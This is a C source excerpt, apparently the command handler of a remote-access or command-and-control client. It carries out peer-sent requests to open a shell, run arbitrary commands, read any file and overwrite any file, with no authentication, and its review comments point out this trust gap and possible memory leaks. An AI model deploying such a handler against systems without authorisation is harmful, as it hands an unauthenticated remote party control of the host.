/* There can only be one driver_console, so store these as global variables. */

/*
 * Receive callback (judging by its name, for bytes read from the console's
 * stdin): forwards the buffer to the session that belongs to the console
 * driver passed in d.
 *
 * data/length: bytes to forward, passed through unmodified.
 * d:           the driver_console_t that owns the session.
 *
 * group, socket, addr and port are not used. Always returns SELECT_OK.
 */
static SELECT_RESPONSE_t console_stdin_recv(void *group, int socket, uint8_t *data, size_t length, char *addr, uint16_t port, void *d)
{
  driver_console_t *console = d;

  message_post_data_out(console->session_id, data, length);

  return SELECT_OK;
}
/*
 * Receive callback for an exec driver: forwards the received bytes to the
 * session that belongs to the driver_exec_t passed in param.
 *
 * data/length: bytes to forward, passed through unmodified.
 * param:       the driver_exec_t that owns the session.
 *
 * group, socket, addr and port are not used. Always returns SELECT_OK.
 */
static SELECT_RESPONSE_t exec_callback(void *group, int socket, uint8_t *data, size_t length, char *addr, uint16_t port, void *param)
{
  driver_exec_t *exec_driver = param;

  message_post_data_out(exec_driver->session_id, data, length);

  return SELECT_OK;
}
/*
 * Receive callback for a client entry: forwards the received bytes to the
 * session recorded in the client_entry_t passed in c.
 *
 * data/length: bytes to forward, passed through unmodified.
 * c:           the client_entry_t whose session_id is used.
 *
 * group, socket, addr and port are not used. Always returns SELECT_OK.
 */
static SELECT_RESPONSE_t client_recv(void *group, int socket, uint8_t *data, size_t length, char *addr, uint16_t port, void *c)
{
  client_entry_t *entry = c;

  message_post_data_out(entry->session_id, data, length);

  return SELECT_OK;
}
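/*
 * Feed newly received bytes into the driver's command stream, then dispatch
 * every complete command packet the stream yields and post one response per
 * packet to the driver's session.
 *
 * driver: command driver whose stream, group and session_id are used.
 * data:   bytes received for this session.
 * length: number of bytes in data.
 *
 * Trust boundary: every packet handled here is parsed from data supplied by
 * the remote peer. The SHELL, EXEC, DOWNLOAD and UPLOAD branches hand
 * peer-supplied command lines and file paths directly to driver_exec_create(),
 * stat() and fopen(); this function performs no validation or authorization
 * of its own. Anything able to write to this session's stream therefore gets
 * process execution and file read/write with this process's privileges.
 * Authentication and integrity of the stream must be enforced before data
 * reaches this function; no such check is visible here.
 */
static void handle_data_in(driver_command_t *driver, uint8_t *data, size_t length)
{
  command_packet_stream_feed(driver->stream, data, length);

  while(command_packet_stream_ready(driver->stream))
  {
    command_packet_t *in  = command_packet_stream_read(driver->stream);
    command_packet_t *out = NULL;

    printf("Got a command: ");
    command_packet_print(in);

    if(in->command_id == COMMAND_PING && in->is_request == TRUE)
    {
      printf("Got a ping request! Responding!\n");
      out = command_packet_create_ping_response(in->request_id, in->r.request.body.ping.data);
    }
    else if(in->command_id == COMMAND_SHELL && in->is_request == TRUE)
    {
#ifdef WIN32
      driver_exec_t *driver_exec = driver_exec_create(driver->group, "cmd.exe", in->r.request.body.shell.name);
#else
      /* TODO: Get the 'default' shell? */
      driver_exec_t *driver_exec = driver_exec_create(driver->group, "sh", in->r.request.body.shell.name);
#endif
      /* Defensive: do not dereference a failed create. Whether
       * driver_exec_create() can return NULL is not visible from here. */
      if(driver_exec)
        out = command_packet_create_shell_response(in->request_id, driver_exec->session_id);
      else
        out = command_packet_create_error_response(in->request_id, -1, "Error starting shell");
    }
    else if(in->command_id == COMMAND_EXEC && in->is_request == TRUE)
    {
      /* The command string comes straight from the peer's packet. */
      driver_exec_t *driver_exec = driver_exec_create(driver->group, in->r.request.body.exec.command, in->r.request.body.exec.name);

      if(driver_exec)
        out = command_packet_create_exec_response(in->request_id, driver_exec->session_id);
      else
        out = command_packet_create_error_response(in->request_id, -1, "Error starting process");
    }
    else if(in->command_id == COMMAND_DOWNLOAD && in->is_request == TRUE)
    {
      struct stat s;

      /* The filename is peer-supplied and used as-is (no path restriction). */
      if(stat(in->r.request.body.download.filename, &s) != 0 || s.st_size < 0)
      {
        out = command_packet_create_error_response(in->request_id, -1, "Error opening file for reading");
      }
      else
      {
#ifdef WIN32
        FILE *f = NULL;
        fopen_s(&f, in->r.request.body.download.filename, "rb");
#else
        FILE *f = fopen(in->r.request.body.download.filename, "rb");
#endif
        if(!f)
        {
          out = command_packet_create_error_response(in->request_id, -1, "Error opening file for reading");
        }
        else
        {
          /* Use one unsigned size for the allocation, the read and the
           * comparison, instead of comparing fread()'s size_t result with
           * the signed st_size.
           *
           * NOTE(review): the size comes from stat() on the path while the
           * content comes from a separate fopen(); if the file changes in
           * between, a shorter file is reported as a read error and a longer
           * one is silently truncated to the stat() size. The whole file is
           * also buffered in memory with no upper bound. */
          size_t   file_size = (size_t) s.st_size;
          uint8_t *file_data = safe_malloc(file_size);

          if(fread(file_data, 1, file_size, f) == file_size)
            out = command_packet_create_download_response(in->request_id, file_data, file_size);
          else
            out = command_packet_create_error_response(in->request_id, -1, "There was an error reading the file");

          fclose(f);
          safe_free(file_data);
        }
      }
    }
    else if(in->command_id == COMMAND_UPLOAD && in->is_request == TRUE)
    {
      /* The filename is peer-supplied and opened with "wb", so an existing
       * file at that path is truncated and overwritten. */
#ifdef WIN32
      FILE *f = NULL;
      fopen_s(&f, in->r.request.body.upload.filename, "wb");
#else
      FILE *f = fopen(in->r.request.body.upload.filename, "wb");
#endif
      if(!f)
      {
        out = command_packet_create_error_response(in->request_id, -1, "Error opening file for writing");
      }
      else
      {
        size_t upload_length = in->r.request.body.upload.length;
        int    write_ok      = 1;

        /* fwrite() with a zero-byte item returns 0 even on success, so only
         * treat the result as a failure when there was something to write. */
        if(upload_length > 0 && fwrite(in->r.request.body.upload.data, upload_length, 1, f) != 1)
          write_ok = 0;

        /* fclose() flushes buffered data; a failure here means the file is
         * incomplete even if fwrite() appeared to succeed. */
        if(fclose(f) != 0)
          write_ok = 0;

        if(write_ok)
          out = command_packet_create_upload_response(in->request_id);
        else
          out = command_packet_create_error_response(in->request_id, -1, "Error writing to file");
      }
    }
    else
    {
      printf("Got a command packet that we don't know how to handle!\n");
      out = command_packet_create_error_response(in->request_id, 0xFFFF, "Not implemented yet!");
    }

    if(out)
    {
      /* Named so they no longer shadow the data/length parameters. */
      uint8_t *response_bytes;
      uint32_t response_length;

      printf("Response: ");
      command_packet_print(out);

      response_bytes = command_packet_to_bytes(out, &response_length);
      message_post_data_out(driver->session_id, response_bytes, response_length);

      /* NOTE(review): response_bytes is not released here. Whether
       * message_post_data_out() takes ownership of the buffer is not
       * visible from this function - confirm, and free it if it does not. */
    }

    /* NOTE(review): neither in nor out is released in this loop. If the
     * packets are heap-allocated by command_packet_stream_read() and the
     * command_packet_create_*() helpers, each handled command leaks them -
     * confirm against the command_packet API. */
  }
}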